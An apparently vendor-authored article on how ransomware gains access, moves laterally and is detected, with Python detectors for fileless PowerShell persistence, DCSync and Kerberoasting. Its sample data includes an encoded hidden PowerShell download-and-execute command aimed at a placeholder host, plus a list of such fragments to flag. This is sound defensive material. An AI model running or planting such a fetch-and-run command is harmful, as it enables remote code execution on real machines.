How To Detect and Stop a Ransomware Attack


Let’s start with the good news.

Law enforcement organizations around the world have stepped up their efforts to find, stop, and arrest ransomware operators, shut down dark web markets, and close crypto mixers and tumblers that help threat actors launder their funds. Plus, governments and organizations have shown a new resilience against paying ransoms, with the White House recently announcing an alliance of 40 countries who have made a commitment to never pay a ransom, and recent reports from blockchain analysis firm, Chainalysis, showing a declining percentage in ransoms paid by victim organizations. All of this makes ransomware a more dangerous, and less lucrative, endeavor for cybercriminals. So, that means rates of ransomware are declining, right?

That’s the bad news.

According to IBM, nearly a quarter of all cyber attacks are now ransomware attacks. And the median initial ransom demand associated with incidents investigated by Arctic Wolf® Incident Response in 2023 grew to $600,000 USD — a 20% increase over last year’s figure of $500,000.

Even worse, the above efforts, rather than deterring threat actors, seem to have instead inspired them to innovate. Double- and triple-extortion models are becoming the norm, rather than the exception and, according to the FBI, while some groups were once unwilling to attack high-value, high-damage targets like hospitals or nuclear power plants, those same groups have publicly announced those targets are now fair game.

According to Arctic Wolf Labs in their 2024 Threats Report: “As the saying goes, no animal is more dangerous than when it’s cornered, and right now ransomware groups are feeling cornered. We expect to see more ambitious ransoms, stricter negotiations, more aggressive naming and shaming, and further experimentation with new tactics throughout 2024.”

With ransomware attacks growing at an exponential rate, and new innovations making the cyber threat landscape more dangerous than ever, how can organizations stay safe? The answer lies in better threat detection and response capabilities that help you properly detect and stop a ransomware attack.

How Ransomware Attacks Begin

Historically, too much faith has been placed on firewalls, intrusion detection systems, and other perimeter defenses to stop ransomware. The idea of keeping the bad guys at the gates is enticing, but in the modern cybersecurity world of cloud environments, identity-based applications, and hybrid networks, it’s also a pipe dream. Organizations need to look for a new path forward, because attempting to stop ransomware and other malware at the network boundaries will never be enough.

If an organization is going to be truly prepared to combat the scourge of ransomware, they need to understand how these attacks begin, and how threat actors gain initial access to their environment. For the past several years, the overwhelming majority of ransomware attacks have begun in one of two ways:

External Exposure
According to data analyzed by Arctic Wolf Labs, in over two-thirds of the ransomware cases we observed, threat actors gained initial access to victim environments through external exposure — a system exposed, whether knowingly or inadvertently, to the public Internet. In 2023, threat actors leveraged external remote access in 39% of cases, while other forms of external exploits, including known vulnerabilities and zero-days, accounted for 29%.

External remote access typically involved identity-based attacks aimed at breaching an organization’s identity and access management (IAM) system — the governance, control, and monitoring of users’ identities and access within a system or network. External remote access attacks can take a few different forms, including:

  • Compromising servers with Remote Desktop Protocol (RDP)
  • Compromising servers with Microsoft Active Directory
  • Using valid credentials purchased from an initial access broker (IAB) on a dark web marketplace

External exploits, however, involve leveraging either a known vulnerability or a zero-day vulnerability to gain access to an environment. While zero-days get all the headlines, they make up a small percentage of cases — just 3.4% of the non-BEC incidents investigated by Arctic Wolf. The true risk lies in the known, unpatched vulnerability.

According to the 2024 Arctic Wolf Labs Threats Report, more than a quarter of non-business email compromise (BEC) incidents we investigated — of which the vast majority were ransomware — exploited a known (i.e., not a zero-day) vulnerability. In theory, an effective patching program could have mitigated the attack or at least forced the threat actor into a different course of action.

User Action
While comprising a smaller section of attacks, user action still accounts for nearly one-quarter of all ransomware attacks’ initial access vectors. User action, simply put, is exactly what it sounds like: one of your employees making a single mistake that puts your organization at risk. That could be anything from visiting a malicious website to opening a booby-trapped file in a phishing email, which allows the threat actor to gain access to your environment. The team at Arctic Wolf Labs has identified four major ways that user action can lead to a ransomware attack:

  • Phishing
    A user clicks on a malicious link and is tricked into sharing credentials or downloading and executing a malicious attachment within an email.
  • Previously compromised credentials
    The threat actor uses credentials that are known to be part of a data breach or credential dump — but that have not yet been deactivated by the victim organization (i.e., user inaction).
  • Malicious software download
    A user falls prey to a drive-by attack or downloaded software containing hidden malicious functionality.
  • Other social engineering
    A user is tricked by a tech support scam or some other social engineering attack besides phishing.

It’s important to note that hardening your environment to protect against ransomware will pay deep dividends against all forms of cyber attack, as the same initial access attack vectors are used in many other forms of cyber attack, including BEC and malware attacks.

How Ransomware Attacks Spread

Once a threat actor has gained initial access to your environment, they immediately begin the next stage of their attack: lateral movement.

Lateral movement consists of tactics threat actors use to move into different parts of the system or go deeper into the system to lock up and/or exfiltrate data and execute their ransomware attack.

Lateral movement is a much more advanced technique, one that requires skill at evading security solutions by pivoting rapidly and employing multiple paths to value. Ransomware typically enters through a single compromised system (e.g. a user endpoint such as a desktop, or an exposed Internet-facing server). It then sends a message to a command-and-control (C2) server, at which point, it will be commanded to encrypt specific file types that may contain sensitive business data. Once this process is set in motion, all bets are off. Here are a few common lateral movement techniques employed by threat actors in ransomware attacks to reach that C2 stage.

Pass-the-Hash
When a user creates a password in a Windows environment, it is hashed and stored in one of several places, including Active Directory. In this lateral movement technique, the threat actor combs through active memory to steal a user’s password hash and “passes” it through the system for authentication, essentially creating a new user session on the same network.

Fileless Malware
Even organizations that are diligent about using next-generation firewalls and application whitelists will miss these “zero-footprint” fileless attacks, as they never land on the hard drive but instead are stored in a system’s memory, making them difficult to detect and adept at moving quickly and spreading widely. PowerShell is often used to inject code into a currently running executable, causing the malware to be executed inside a known good process. Or code can be loaded directly into memory and executed from there. A typical persistence mechanism lives inside the registry and is executed at startup via a service, so no part of the malware is ever stored in a file, avoiding antivirus detections.
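Because the persistence described above (and in Step 3 of the timeline below) leaves no file on disk, one defensive check is to inspect autorun registry values for PowerShell launched with an encoded command and decode that command so an analyst can read what runs at startup. The following is an added example, not Arctic Wolf code; the Run-key values, value names and payload are constructed and the `.invalid` URL is a placeholder.

```python
import base64
import re
from typing import Dict, List, Optional

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (a UTF-16LE script).
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Fragments that, in an autorun entry, point to in-memory loading or a hidden window.
SUSPECT = ("downloadstring", "invoke-expression", "iex ", "frombase64string", "-w hidden", "reflection.assembly")


def decode_encoded_command(value: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script if the value carries one, else None."""
    m = ENC_FLAG.search(value)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE: leave for manual review


def score_autorun(value: str) -> List[str]:
    """Reasons an autorun command line looks like fileless PowerShell persistence."""
    if "powershell" not in value.lower():
        return []
    decoded = decode_encoded_command(value)
    reasons = ["encoded command"] if decoded is not None else []
    text = (value + " " + (decoded or "")).lower()  # inspect both the wrapper and the payload
    return reasons + [k.strip() for k in SUSPECT if k in text]


def scan_run_key(entries: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each flagged value name to its reasons; clean entries are omitted."""
    return {name: r for name, v in entries.items() if (r := score_autorun(v))}


# Constructed sample Run-key values (hypothetical, not taken from a real host).
CONSTRUCTED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage.ps1')"
SAMPLE_RUN_KEY = {
    "OneDrive": r'"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": "powershell.exe -nop -w hidden -enc "
               + base64.b64encode(CONSTRUCTED_PAYLOAD.encode("utf-16-le")).decode(),
}
```

On a live host the same `score_autorun` would be fed the values read from the HKLM and HKCU Run keys and from service ImagePath entries; the decoded script is what the analyst should review.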

Kerberoasting
Kerberos is an authentication service protocol found in Windows environments. Meant to secure users and devices using secret keys rather than plaintext passwords, it uses encrypted tickets passed between the user and the authentication service for verification. In Kerberoasting, also known as pass-the-ticket, the threat actor steals one of these tickets and uses specialized hacking tools to decrypt it, revealing the user’s password and granting them access to the user’s account.

What a Ransomware Attack Looks Like in the Real World

The experts in our Triage Security and Incident Response Teams have significant experience responding to and stopping ransomware attacks. As such, they’re able to paint a clear picture of how a typical ransomware attack can unfold:

Step 1
The threat actor sends a phishing email to a user. That user opens the email and clicks on the malicious link, executing the malware attached to the email.

Step 2
The malware “calls home” to the threat actor’s command and control (C2) server, copying code into memory and executing it.

Step 3
The malware maintains persistence in the environment via a legitimate service that now executes code hidden inside a registry key (fileless malware).

Step 4
The threat actor dumps the hashes out of the system’s memory via an LSASS dump (credential access). Using the hash for an admin account used by an IT employee, the threat actor crafts a fake Kerberos ticket to get the hash of the enterprise admin.

Step 5
The threat actor uses the hash of the Enterprise Admin account via pass-the-hash (lateral movement) to perform a DCSync attack (privilege escalation). A DCSync attack impersonates a Domain Controller — the servers used in Microsoft environments to authenticate network security requests from around the network. In this case, the DCSync attack grants the threat actor the hashed passwords of all users in the domain. From that point, they have full access to the environment and are ready to deploy their ransomware.
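Steps 4 and 5 above, and the Kerberos ticket abuse described under lateral movement, both surface in Windows Security event logs: a DCSync shows up as Event ID 4662 where a non-DC account exercises a directory replication right, and a request for a crackable service ticket shows up as Event ID 4769 with RC4 (0x17) encryption for a service run under a user account. The following detector is an added example, not Arctic Wolf code; the event records, host names, accounts and IP address are constructed, and the replication-right GUIDs are the documented Active Directory extended rights.

```python
from typing import Dict, List, Set

# Extended-right GUIDs that grant directory replication; a DCSync needs one of these.
REPLICATION_GUIDS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
)
RC4_HMAC = "0x17"  # weak ticket encryption type typically seen in Kerberoasting requests


def is_dcsync(event: Dict[str, str], dc_accounts: Set[str]) -> bool:
    """Event 4662 in which a non-DC account exercises a replication right."""
    if event.get("EventID") != "4662":
        return False
    subject = event.get("SubjectUserName", "")
    if subject in dc_accounts or subject.endswith("$"):
        return False  # domain controllers (machine accounts) replicate legitimately
    props = event.get("Properties", "").lower()
    return any(guid in props for guid in REPLICATION_GUIDS)


def is_kerberoast_request(event: Dict[str, str]) -> bool:
    """Event 4769 asking for an RC4 ticket to a service run under a user account."""
    if event.get("EventID") != "4769":
        return False
    service = event.get("ServiceName", "")
    if service.endswith("$") or service.lower() == "krbtgt":
        return False  # machine accounts and the KDC itself are not the pattern of interest
    return event.get("TicketEncryptionType", "").lower() == RC4_HMAC


def triage(events: List[Dict[str, str]], dc_accounts: Set[str]) -> List[str]:
    """One alert string per suspicious record, in input order."""
    alerts = []
    for e in events:
        if is_dcsync(e, dc_accounts):
            alerts.append(f"DCSync by {e['SubjectUserName']} from {e.get('IpAddress', '?')}")
        elif is_kerberoast_request(e):
            alerts.append(f"RC4 service ticket for {e['ServiceName']} requested by {e.get('TargetUserName', '?')}")
    return alerts


# Constructed sample records (hypothetical hosts and accounts, not from a real environment).
SAMPLE_EVENTS = [
    {"EventID": "4662", "SubjectUserName": "DC01$", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": "4662", "SubjectUserName": "it-admin", "IpAddress": "10.0.5.23",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": "4769", "ServiceName": "sqlsvc", "TargetUserName": "it-admin@CORP", "TicketEncryptionType": "0x17"},
    {"EventID": "4769", "ServiceName": "FS01$", "TargetUserName": "jdoe@CORP", "TicketEncryptionType": "0x12"},
]
```

Auditing of directory service access (for 4662) and Kerberos service ticket operations (for 4769) must be enabled on the domain controllers for these records to exist at all.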

How to Detect and Stop a Ransomware Attack

By the time the ransom note appears on computer screens across your organization, it’s already too late to stop the attack. Proper detection and mitigation of a ransomware attack must begin further up the kill chain.

Stage 1: Initial Access
A major part of preventing a ransomware attack at this stage comes down to keeping your focus on your cybersecurity fundamentals.

  • User Training: A security awareness training program that uses frequent touchpoints, current topics, and shame-free phishing simulations can help prepare your employees to recognize and neutralize social engineering attacks like phishing, drastically reducing user action errors in your organization and keeping threat actors from gaining a foothold in the first place.
  • Vulnerability Management: Proactively managing risk by patching and remediating known vulnerabilities can narrow your attack surface and make it more difficult for threat actors to find a viable path into your environment.
  • Holistic Visibility: A lack of visibility allows ransomware attacks to go unnoticed and cause significant damage to organizations. Log monitoring is critical to detect attacks in their earliest stages. This includes logs from intrusion detection systems (IDS), network detection and response (NDR) systems, endpoint detection and response (EDR) solutions, firewalls, identity and access management (IAM) systems, email services (e.g., to monitor for changes in access and the creation of filtering rules), and the cloud-hosted services that extend your organization’s environment beyond your own infrastructure.
  • Identity Controls: Identity is a major battleground in modern cybersecurity. According to Verizon’s 2023 Data Breach Investigations Report, 74% of all breaches involve the human element, with people involved either through error, privilege misuse, social engineering, or stolen credentials — the latter three of which directly involve the management (and mismanagement) of user identities. Threat actors are adept at finding and leveraging credentials that allow them to log into services and move unnoticed around victim environments. Multi-factor authentication is an effective way to harden defenses; for example, effective MFA can help to prevent the account takeovers behind some ransomware attacks.


Stage 2: Lateral Movement
If threat actors are able to breach your environment and gain initial access, every second counts. At this stage, it’s vital that you can quickly detect unusual activity and respond to it before they are able to inflict damage.

Managed Detection and Response
It’s here that 24×7 monitoring, detection, and response by trained security personnel is crucial. Without the ability to monitor your entire environment — endpoints, network and cloud — in real time, threat actors have the advantage.

Many security teams turn to tools to aid in this monitoring. Unfortunately, alert fatigue is a common problem, born of the many false positives triggered by these existing security tools. And, while artificial intelligence (AI) and machine learning (ML) can aid in separating the signal from the noise, human expertise is still essential to elevating the actionable alerts out of the pile.

Also, as organizations add more tools, tech sprawl becomes a real problem. While malware with known signatures will be caught by these perimeter defenses, new strains of malware or suspicious file traffic might not trigger an alert if the tools have not been updated. There may be billions of daily network events, and thousands of potentially harmful alerts. Organizations need a central platform to ingest these alerts and cross-correlate them, using human experts to determine which to investigate.

That’s where managed detection and response comes in. The best solutions work with your existing technology stack to discover and profile assets and collect data and security event observations from multiple sources, providing broad visibility, 24×7 monitoring, and advanced threat detection.

Incident Response
Ransomware incident response takes many different forms, depending on the point at which the team is engaged. A good IR provider can handle everything from containing the attack and locking out the threat actor, to restoring systems and even threat actor negotiations.

A ransomware incident response plan, however, should include more than just the steps taken in the immediate aftermath of an attack. It should also include remediation of the root point of compromise to prevent future exploitation, a thorough analysis with your IR team of the forensic findings to harden your security posture against other attacks, and additional monitoring against re-entry attempts post-breach.

Incident Response is available from a variety of companies, each offering a range of services directly to organizations or through cyber insurance carriers. Be sure to select a full-service vendor with in-house expertise to provide comprehensive digital forensics, data recovery services, and ransomware experience. Only full-service providers eliminate the threat actor’s access to the environment, analyze the cause and extent of the attack, and restore the business to normal pre-incident operations.




Arctic Wolf


Arctic Wolf provides your team with 24x7 coverage, security operations expertise, and strategically tailored security recommendations to continuously improve your overall posture.